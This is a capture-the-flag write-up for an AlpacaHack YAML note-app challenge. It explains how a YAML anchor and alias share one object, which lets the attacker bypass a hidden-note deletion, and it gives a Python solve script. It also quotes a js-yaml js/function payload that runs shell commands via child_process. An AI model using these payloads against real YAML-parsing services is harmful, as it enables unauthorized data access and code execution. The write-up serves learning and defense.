"AlpacaHack - Apr 22, 2026": YAML Ain't Markup Language

link to the challenge if you wanna give it a try

Unnecessary rambling (skip if not interested)

After solving my first challenge on AlpacaHack, I felt excited to try more challenges from the same author—I wanna get to know authors by consuming every challenge they make :). I did a lot of client-side stuff over the past month, so I decided to solve some server-side ones for a change. This challenge really taught me a lot!

Challenge description

The challenge is a simple note-taking application with a POST endpoint that takes a YAML file in the body of the request and either:

1. creates a note and issues an ID, or
2. gets a note using its ID.

The notes are stored in a global Map:

1
const notes = new Map();

And note creation is handled as follows:

1
function handleCreateCommand(doc, index, sessionId) {
2
  const content = doc.content;
3
  if (typeof content !== "string") {
4
    return [null, { error: "invalid content", index }];
5
  }
6

7
  const id = randomUUID();
8
  doc.sessionId = sessionId;
9
  if (doc.isHidden) {
10
    doc.content = FLAG;
11
    delete doc.sessionId;
12
    delete doc.isHidden;
13
  }
14
  notes.set(id, doc);
15

16
  return [
17
    {
18
      command: "create",
19
      id,
20
    },
21
    null,
22
  ];
23
}

where doc is the parsed YAML using a recent version of js-yaml:

1
// returns array of yaml docs after which the challenge code loops through each and performs create/get on it
2
parsedDocs = load(req.body || "");

As you can see above, if isHidden is set, the content of the doc is set to FLAG, and both the sessionId and isHidden properties get deleted. This effectively makes the note inaccessible due to how the GET handler acts:

1
function handleGetCommand(doc, index, sessionId) {
2
  const id = doc.id;
3
  if (typeof id !== "string") {
4
    return [null, { error: "invalid id", index }];
5
  }
6

7
  const note = notes.get(id);
8
  if (!note || !note.sessionId || note.sessionId !== sessionId) {
9
    return [null, { error: "not found", index }];
10
  }
11

12
  return [
13
    {
14
      command: "get",
15
      id,
16
      content: note.content,
17
    },
18
    null,
19
  ];
20
}

The author of the challenge assumes note.sessionId will always be undefined/null, thus making the FLAG note inaccessible to the user.

Issues and difficulties

Because the challenge falls under the YAML topic, I looked up some YAML exploits and read Jorian’s blog about a YAML feature that enables the execution of host functions (in our case, JavaScript functions) upon deserialization. Jorian talked about YAML tags, which are ways you can explicitly tell the parser to treat a given value in special ways. Most notably:

1
"toString": !<tag:yaml.org,2002:js/function> "function (){console.log(process.mainModule.require('child_process').execSync('id').toString())}"

This was a payload that used the js/function tag to define a function to be called instead of toString found in the prototype chain.

Naturally, I tried the payload, but it didn’t work. When I debugged the problem, I found that tags have to be defined in a schema, and unfortunately for us, no js/function tag exists in js-yaml’s DEFAULT_SCHEMA.

At this point, I shifted from trying to abuse the YAML deserialization process and moved to thinking of ways to defy the delete keyword. MDN showed me this:

delete only has an effect on own properties, so if we can make something like this happen:

1
{
2
    "foo": "bar",
3
    "__proto__": {
4
        "sessionId": "baz"
5
    }
6
}

we can bypass the deletion process and still access our property at GET time. Unfortunately, this version of js-yaml is already patched and treats __proto__ as a data property.

It would be interesting to have the deserialization of js-yaml’s __proto__ be fed to an Object.assign(...) or something similar. I’m keeping this one as a challenge idea.

Rabbithole

I spent a LOT of time at this step. I kept looking for JS tricks to bypass strict equality (stupid me, lol). I even suspected that the cookie parser had something to do with the challenge and ended up finding JSON Cookies, which is a way to define a cookie object instead of a string. All of these, of course, were futile attempts to solve the challenge.

The main struggle I was facing was disorientation. I was thinking excessively about the tools I had (YAML features, JS tricks, etc.), but not enough about the invariants in the challenge. Let’s consider something again:

The developer assumes that once a note is created, it’s effectively hidden. It’s hidden because no sessionId is set on it. Can we somehow set the sessionId even after deletion?

Object references

It turns out there IS a way to re-add the sessionId after deletion, and that is by using YAML tags:

• YAML allows you to create an anchor by adding an & and a name in front of a value. You can then later reference that value with an alias: an * followed by the name.

Meaning, something like:

1
- &a
2
  sessionId: foo
3
- *a

would result in:

1
[ { sessionId: 'foo' }, { sessionId: 'foo' } ]

The question then becomes: do these objects point to the same memory reference?

It turns out they do:

1
> doc
2
[ { sessionId: 'foo' }, { sessionId: 'foo' } ]
3
> delete doc[0].sessionId
4
true
5
> doc
6
[ {}, {} ]

Solution

To solve the challenge, we can abuse the shared reference as follows:

1. First, create a hidden note and tag it in YAML.
2. Second, perform another create operation that sets the sessionId:

1
doc.sessionId = sessionId;

This skips the isHidden check (already deleted from the first run):

1
if (doc.isHidden) { // condition skipped, no deletion :)
2
  doc.content = FLAG;
3
  delete doc.sessionId;
4
  delete doc.isHidden;
5
}

We can then use one of the given IDs (it doesn’t matter which we choose because it’s the same reference!) to fetch the flag. Everything can be scripted as follows:

solve.py

1
#!/usr/bin/env python3
2

3
import requests
4

5
url = 'http://localhost:3000/'
6
# url = 'http://34.170.146.252:31918'
7
payload = '''
8
- &a
9
  command: create
10
  content: ""
11
  isHidden: true
12
- *a
13
'''
14

15
session = requests.Session()
16

17
resp = session.post(url, data=payload, headers={'Content-Type': 'text/plain'})
18
session.get(url, data=payload, headers={'Content-Type': 'text/plain'})
19
response_data = resp.json()
20

21
sid = resp.cookies.get('sid')
22

23
target_id = response_data['results'][0]['id']
24

25
get_payload = f'''
26
- command: get
27
  id: "{target_id}"
28
'''
29

30
get_resp = session.post(
31
    url,
32
    data=get_payload,
33
    headers={'Content-Type': 'text/plain'}
34
)
35

36
print("\nFollow-up GET Command Response:")
37
try:
38
    print(get_resp.json())
39
except requests.exceptions.JSONDecodeError:
40
    print(get_resp.text)

And just like that, the flag is: Alpaca{y4ml_1snt_bett3r_JS0N}

Key takeaways

• YAML Anchors and Aliases Preserve References: Using & (anchor) and * (alias) in YAML doesn’t just duplicate data. In parsers like js-yaml, it creates multiple references to the exact same object in memory.
• Shared State Mutation: Because aliases point to the same memory reference, mutating the object via one reference (e.g., adding sessionId back on the second pass) affects all other instances. This is what ultimately allowed us to bypass the application’s logic.
• The delete Operator: In JavaScript, delete only removes an object’s own properties. It does not affect properties inherited from the prototype chain. While js-yaml correctly handles __proto__ to prevent prototype pollution, this behavior is still a crucial JS quirk to keep in your back pocket.
• Focus on Invariants Over Tools: When stuck in a rabbithole, take a step back from flashy exploits (like RCE via custom tags or parsing JSON cookies) and analyze the core assumptions the developer made about the program’s state.

References

• The YAML Document from Hell
• MDN Web Docs: delete operator
• YAML Specification 1.2.2: Tags
• Jorian’s Notes on YAML Vulnerabilities